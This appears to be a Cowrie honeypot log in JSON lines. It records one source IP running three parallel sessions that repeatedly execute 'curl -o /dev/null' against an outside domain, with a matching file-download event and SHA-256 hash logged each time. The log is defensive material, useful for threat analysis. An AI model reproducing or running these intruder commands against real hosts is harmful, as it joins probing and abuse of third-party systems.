{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.207197Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.209207Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.210438Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.211287Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.215281Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.216983Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.217657Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.219739Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.220627Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.266937Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.267651Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.271344Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.273898Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.276556Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.277721Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.278464Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.279995Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.280800Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.317005Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.317777Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.320766Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.322098Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.322863Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.324670Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.325272Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.327673Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.330773Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.355938Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.357062Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.357528Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.360816Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.363899Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.364856Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.367151Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.368099Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.393564Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.398290Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.399121Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.400791Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.401230Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.407044Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.409468Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.410165Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.435532Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.439289Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.440283Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.440994Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.443842Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.444676Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.446951Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.447731Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.478642Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.481318Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.483995Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.484598Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.486917Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.488003Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.491684Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.492770Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.497716Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.502018Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.533024Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.534412Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.534865Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.538025Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.547996Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.553836Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.555591Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.568375Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.573531Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.575233Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.677407Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.678239Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.684739Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.686792Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.691039Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.715241Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.716107Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.722800Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.724063Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
